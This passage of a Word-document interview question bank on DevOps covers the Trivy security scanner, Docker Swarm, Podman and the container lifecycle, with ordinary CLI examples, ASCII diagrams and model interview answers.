    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Trivy?</w:t>
        <w:br/>
        <w:t>Trivy is an open-source security scanner developed by  Aqua Security Trivy that scans:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Filesystems</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Git repositories</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Infrastructure as Code (IaC)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * SBOMs (Software Bill of Materials)</w:t>
        <w:br/>
        <w:t>for vulnerabilities, misconfigurations, secrets, and license issues.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why is Trivy Popular?</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easy to install and use</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Fast scanning</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Supports multiple artifact types</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Integrates with CI/CD pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Works well with Docker and Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Open source</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What Can Trivy Scan?</w:t>
        <w:br/>
        <w:t>1. Container Images</w:t>
        <w:br/>
        <w:t>trivy image nginx:latest</w:t>
        <w:br/>
        <w:t>Scans:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * OS packages</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application dependencies</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Known CVEs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Filesystems</w:t>
        <w:br/>
        <w:t>trivy fs .</w:t>
        <w:br/>
        <w:t>Scans local directories and source code.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Git Repositories</w:t>
        <w:br/>
        <w:t>trivy repo https://github.com/example/repo</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Kubernetes Clusters</w:t>
        <w:br/>
        <w:t>trivy k8s cluster</w:t>
        <w:br/>
        <w:t>Checks workloads and configurations.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Infrastructure as Code</w:t>
        <w:br/>
        <w:t>Scans:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Terraform</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes YAML</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Dockerfiles</w:t>
        <w:br/>
        <w:t>trivy config .</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of Findings</w:t>
        <w:br/>
        <w:t>Vulnerabilities</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>openssl</w:t>
        <w:br/>
        <w:t>glibc</w:t>
        <w:br/>
        <w:t>curl</w:t>
        <w:br/>
        <w:t>Reported with severity:</w:t>
        <w:br/>
        <w:t>CRITICAL</w:t>
        <w:br/>
        <w:t>HIGH</w:t>
        <w:br/>
        <w:t>MEDIUM</w:t>
        <w:br/>
        <w:t>LOW</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Secrets Detection</w:t>
        <w:br/>
        <w:t>Finds:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * API keys</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * AWS credentials</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Tokens</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Passwords</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Misconfigurations</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t>Container running as root</w:t>
        <w:br/>
        <w:t>Privileged container</w:t>
        <w:br/>
        <w:t>Public S3 bucket</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Scan</w:t>
        <w:br/>
        <w:t>trivy image myapp:v1</w:t>
        <w:br/>
        <w:t>Sample output:</w:t>
        <w:br/>
        <w:t>Total: 8 vulnerabilities</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CRITICAL: 1</w:t>
        <w:br/>
        <w:t>HIGH: 3</w:t>
        <w:br/>
        <w:t>MEDIUM: 2</w:t>
        <w:br/>
        <w:t>LOW: 2</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CI/CD Integration</w:t>
        <w:br/>
        <w:t>Pipeline flow:</w:t>
        <w:br/>
        <w:t>Code Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Build Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Trivy Scan</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Pass?</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ┌────┴────┐</w:t>
        <w:br/>
        <w:t>Yes       No</w:t>
        <w:br/>
        <w:t xml:space="preserve"> │         │</w:t>
        <w:br/>
        <w:t>Deploy    Block Pipeline</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>trivy image --exit-code 1 \</w:t>
        <w:br/>
        <w:t>--severity CRITICAL,HIGH \</w:t>
        <w:br/>
        <w:t>myapp:v1</w:t>
        <w:br/>
        <w:t>Pipeline fails if critical/high vulnerabilities are found.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Trivy and Kubernetes</w:t>
        <w:br/>
        <w:t>Scan cluster:</w:t>
        <w:br/>
        <w:t>trivy k8s cluster</w:t>
        <w:br/>
        <w:t>Check:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * RBAC issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Privileged containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Security misconfigurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Vulnerable images</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t>✅ Open source</w:t>
        <w:br/>
        <w:t>✅ Fast and lightweight</w:t>
        <w:br/>
        <w:t>✅ CI/CD friendly</w:t>
        <w:br/>
        <w:t>✅ Multi-target scanning</w:t>
        <w:br/>
        <w:t>✅ Vulnerability + secret + config scanning</w:t>
        <w:br/>
        <w:t>✅ Kubernetes support</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Trivy is an open-source security scanner developed by Aqua Security that identifies vulnerabilities, secrets, misconfigurations, and license issues across container images, Kubernetes clusters, source code repositories, and infrastructure-as-code artifacts. It integrates easily into CI/CD pipelines and supports scanning of both operating system packages and application dependencies. In DevSecOps environments, Trivy is commonly used as a security gate to prevent vulnerable container images and insecure configurations from being deployed to production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q368. Explain Docker Swarm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Docker Swarm?</w:t>
        <w:br/>
        <w:t>Docker Swarm is Docker’s native container orchestration platform that allows you to manage and run containers across a cluster of multiple Docker hosts.</w:t>
        <w:br/>
        <w:t>It turns a group of Docker servers into a single logical cluster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Docker Swarm?</w:t>
        <w:br/>
        <w:t>Without Swarm:</w:t>
        <w:br/>
        <w:t>Server 1 → Containers</w:t>
        <w:br/>
        <w:t>Server 2 → Containers</w:t>
        <w:br/>
        <w:t>Server 3 → Containers</w:t>
        <w:br/>
        <w:t>You manage each server separately.</w:t>
        <w:br/>
        <w:t>With Swarm:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          Docker Swarm Cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ┌─────────────┼─────────────┐</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼             ▼             ▼</w:t>
        <w:br/>
        <w:t xml:space="preserve">   Node 1        Node 2        Node 3</w:t>
        <w:br/>
        <w:t>All nodes are managed as a single system.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Swarm Components</w:t>
        <w:br/>
        <w:t>1. Manager Node</w:t>
        <w:br/>
        <w:t>Responsible for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cluster management</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Scheduling containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Maintaining desired state</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Handling API requests</w:t>
        <w:br/>
        <w:t>2. Worker Node</w:t>
        <w:br/>
        <w:t>Responsible for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Running application containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Executing tasks assigned by managers</w:t>
        <w:br/>
        <w:t>Architecture:</w:t>
        <w:br/>
        <w:t xml:space="preserve">       Manager Node</w:t>
        <w:br/>
        <w:t xml:space="preserve">              │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ┌───────┴───────┐</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼               ▼</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Worker Node 1   Worker Node 2</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Create a Swarm Cluster</w:t>
        <w:br/>
        <w:t>Initialize Swarm:</w:t>
        <w:br/>
        <w:t>docker swarm init</w:t>
        <w:br/>
        <w:t>Output provides a join token.</w:t>
        <w:br/>
        <w:t>Join worker node:</w:t>
        <w:br/>
        <w:t>docker swarm join \</w:t>
        <w:br/>
        <w:t>--token &lt;token&gt; \</w:t>
        <w:br/>
        <w:t>&lt;manager-ip&gt;:2377</w:t>
        <w:br/>
        <w:t>View nodes:</w:t>
        <w:br/>
        <w:t>docker node ls</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Services in Swarm</w:t>
        <w:br/>
        <w:t>Instead of running containers directly, Swarm runs services.</w:t>
        <w:br/>
        <w:t>Create service:</w:t>
        <w:br/>
        <w:t>docker service create \</w:t>
        <w:br/>
        <w:t>--name nginx \</w:t>
        <w:br/>
        <w:t>--replicas 3 \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t>Nginx Service</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ┌────┼────┐</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ▼    ▼    ▼</w:t>
        <w:br/>
        <w:t>C1   C2   C3</w:t>
        <w:br/>
        <w:t>Swarm maintains 3 replicas automatically.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Scaling</w:t>
        <w:br/>
        <w:t>Scale service:</w:t>
        <w:br/>
        <w:t>docker service scale nginx=5</w:t>
        <w:br/>
        <w:t>Before: 3 Containers</w:t>
        <w:br/>
        <w:t>After : 5 Containers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Self-Healing</w:t>
        <w:br/>
        <w:t>If a container crashes:</w:t>
        <w:br/>
        <w:t>Container Crash</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Swarm Detects Failure</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>New Container Created</w:t>
        <w:br/>
        <w:t>Desired state is maintained automatically.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Load Balancing</w:t>
        <w:br/>
        <w:t>Swarm provides built-in load balancing.</w:t>
        <w:br/>
        <w:t>Client Request</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Routing Mesh</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ┌─────┼─────┐</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ▼     ▼     ▼</w:t>
        <w:br/>
        <w:t>C1    C2    C3</w:t>
        <w:br/>
        <w:t>Traffic is distributed across replicas.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Overlay Networking</w:t>
        <w:br/>
        <w:t>Swarm uses overlay networks for multi-host communication.</w:t>
        <w:br/>
        <w:t>Node 1                     Node 2</w:t>
        <w:br/>
        <w:t>------                     ------</w:t>
        <w:br/>
        <w:t>Container A ← Overlay → Container B</w:t>
        <w:br/>
        <w:t>Containers communicate even across different servers.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rolling Updates</w:t>
        <w:br/>
        <w:t>Update application version:</w:t>
        <w:br/>
        <w:t>docker service update \</w:t>
        <w:br/>
        <w:t>--image nginx:1.29 \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>Swarm updates containers gradually with minimal downtime.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Swarm vs Kubernetes</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker Swarm</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Setup</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simple</w:t>
        <w:br/>
        <w:tab/>
        <w:t>More Complex</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Learning Curve</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Easy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Steeper</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scalability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Good</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Excellent</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Ecosystem</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Smaller</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Very Large</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Enterprise Adoption</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Industry Standard</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Auto-Healing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rolling Updates</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Advantages</w:t>
        <w:br/>
        <w:t>✅ Easy to set up</w:t>
        <w:br/>
        <w:t>✅ Native Docker integration</w:t>
        <w:br/>
        <w:t>✅ Built-in load balancing</w:t>
        <w:br/>
        <w:t>✅ Overlay networking</w:t>
        <w:br/>
        <w:t>✅ Self-healing services</w:t>
        <w:br/>
        <w:t>✅ Rolling updates</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t>❌ Smaller ecosystem</w:t>
        <w:br/>
        <w:t>❌ Fewer advanced features</w:t>
        <w:br/>
        <w:t>❌ Less flexible scheduling</w:t>
        <w:br/>
        <w:t>❌ Less adoption compared to Kubernetes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Docker Swarm is Docker’s native container orchestration platform that enables management of containerized applications across multiple Docker hosts. It uses a manager-worker architecture where manager nodes handle scheduling and cluster state, while worker nodes execute container workloads. Swarm provides service discovery, overlay networking, load balancing, self-healing, scaling, and rolling updates. Although Docker Swarm is simpler to deploy and manage than Kubernetes, Kubernetes has become the dominant orchestration platform due to its richer ecosystem, advanced scheduling capabilities, and broader enterprise adoption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q369. What is Podman?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Podman?</w:t>
        <w:br/>
        <w:t>Podman (Pod Manager) is an open-source container engine used to develop, run, and manage OCI-compliant containers.</w:t>
        <w:br/>
        <w:t>It is often considered a Docker alternative because it provides a very similar CLI experience but does not require a central daemon.</w:t>
        <w:br/>
        <w:t>Developed by Red Hat, Podman is widely used in enterprise Linux environments.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key Difference: Docker vs Podman</w:t>
        <w:br/>
        <w:t>Docker</w:t>
        <w:br/>
        <w:t>Docker CLI</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Docker Daemon (dockerd)</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Containers</w:t>
        <w:br/>
        <w:t>Podman</w:t>
        <w:br/>
        <w:t>Podman CLI</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Containers</w:t>
        <w:br/>
        <w:t>Podman is daemonless, meaning there is no long-running dockerd process.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Features</w:t>
        <w:br/>
        <w:t>Daemonless Architecture</w:t>
        <w:br/>
        <w:t>Run containers directly without a background daemon.</w:t>
        <w:br/>
        <w:t>Benefits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduced attack surface</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Simpler architecture</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Better security</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rootless Containers</w:t>
        <w:br/>
        <w:t>Podman supports rootless execution by default.</w:t>
        <w:br/>
        <w:t>podman run nginx</w:t>
        <w:br/>
        <w:t>Containers can run as a normal user without root privileges.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>OCI Compliant</w:t>
        <w:br/>
        <w:t>Podman works with OCI standards and runtimes such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * runc</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * crun</w:t>
        <w:br/>
        <w:t>Images built with Docker generally work with Podman and vice versa.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker-Compatible Commands</w:t>
        <w:br/>
        <w:t>Docker:</w:t>
        <w:br/>
        <w:t>docker run nginx</w:t>
        <w:br/>
        <w:t>Podman:</w:t>
        <w:br/>
        <w:t>podman run nginx</w:t>
        <w:br/>
        <w:t>Most Docker commands work with minimal or no changes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What is a Pod in Podman?</w:t>
        <w:br/>
        <w:t>Unlike Docker, Podman supports Pods natively.</w:t>
        <w:br/>
        <w:t>A Pod is a group of containers sharing:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network namespace</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * IPC namespace</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Storage resources</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├─ Application Container</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Sidecar Container</w:t>
        <w:br/>
        <w:t>Similar to a Kubernetes Pod.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pod Example</w:t>
        <w:br/>
        <w:t>Create a pod:</w:t>
        <w:br/>
        <w:t>podman pod create --name mypod</w:t>
        <w:br/>
        <w:t>Run container in pod:</w:t>
        <w:br/>
        <w:t>podman run -dt --pod mypod nginx</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Generate Kubernetes YAML</w:t>
        <w:br/>
        <w:t>One useful feature:</w:t>
        <w:br/>
        <w:t>podman generate kube mypod</w:t>
        <w:br/>
        <w:t>Produces Kubernetes manifests that can be deployed to a Kubernetes cluster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Podman vs Docker</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Podman</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Daemon</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rootless Support</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Native</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Supported but optional</w:t>
        <w:br/>
        <w:tab/>
        <w:t>OCI Compatible</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Native</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker CLI Compatibility</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Native</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Generally stronger by default</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Good</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Commands</w:t>
        <w:br/>
        <w:t>Run container:</w:t>
        <w:br/>
        <w:t>podman run -d nginx</w:t>
        <w:br/>
        <w:t>List containers:</w:t>
        <w:br/>
        <w:t>podman ps</w:t>
        <w:br/>
        <w:t>Pull image:</w:t>
        <w:br/>
        <w:t>podman pull nginx</w:t>
        <w:br/>
        <w:t>Build image:</w:t>
        <w:br/>
        <w:t>podman build -t myapp .</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Podman is an open-source, OCI-compliant container engine developed by Red Hat. Unlike Docker, Podman uses a daemonless architecture, where containers are managed directly without a central daemon process. It provides strong support for rootless containers, improving security by reducing the need for privileged operations. Podman is largely compatible with Docker commands and additionally supports Kubernetes-style pods natively. Due to its security model, OCI compliance, and Kubernetes integration capabilities, Podman is a popular choice in enterprise Linux and cloud-native environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q370. Explain container lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Container Lifecycle</w:t>
        <w:br/>
        <w:t>The container lifecycle describes the different states a container goes through from creation to deletion.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Lifecycle Stages</w:t>
        <w:br/>
        <w:t>Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ▼</w:t>
        <w:br/>
        <w:t>Created</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ▼</w:t>
        <w:br/>
        <w:t>Running</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ├──► Paused</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │         │</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │         ▼</w:t>
        <w:br/>
        <w:t xml:space="preserve">  └────── Unpaused</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ▼</w:t>
        <w:br/>
        <w:t>Stopped</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ▼</w:t>
        <w:br/>
        <w:t>Removed</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Image</w:t>
        <w:br/>
        <w:t>A container starts from an image.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker pull nginx</w:t>
        <w:br/>
        <w:t>The image acts as a template for creating containers.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Created</w:t>
        <w:br/>
        <w:t>Container metadata and filesystem are created, but the application is not started.</w:t>
        <w:br/>
        <w:t>docker create --name web nginx</w:t>
        <w:br/>
        <w:t>Check status:</w:t>
        <w:br/>
        <w:t>docker ps -a</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>Created</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Running</w:t>
        <w:br/>
        <w:t>Container process is actively running.</w:t>
        <w:br/>
        <w:t>docker start web</w:t>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>docker run -d nginx</w:t>
        <w:br/>
        <w:t>State:</w:t>
        <w:br/>
        <w:t>Running</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Paused</w:t>
        <w:br/>
        <w:t>Container processes are temporarily suspended.</w:t>
        <w:br/>
        <w:t>docker pause web</w:t>
        <w:br/>
        <w:t>Resume:</w:t>
        <w:br/>
        <w:t>docker unpause web</w:t>
        <w:br/>
        <w:t>Use case:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Maintenance</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Troubleshooting</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Resource management</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Stopped (Exited)</w:t>
        <w:br/>
        <w:t>Main process inside the container has stopped.</w:t>
        <w:br/>
        <w:t>docker stop web</w:t>
        <w:br/>
        <w:t>or application exits naturally.</w:t>
        <w:br/>
        <w:t>State:</w:t>
        <w:br/>
        <w:t>Exited</w:t>
        <w:br/>
        <w:t>Container still exists and can be restarted.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6. Restarted</w:t>
        <w:br/>
        <w:t>A stopped container can be started again.</w:t>
        <w:br/>
        <w:t>docker restart web</w:t>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>docker start web</w:t>
        <w:br/>
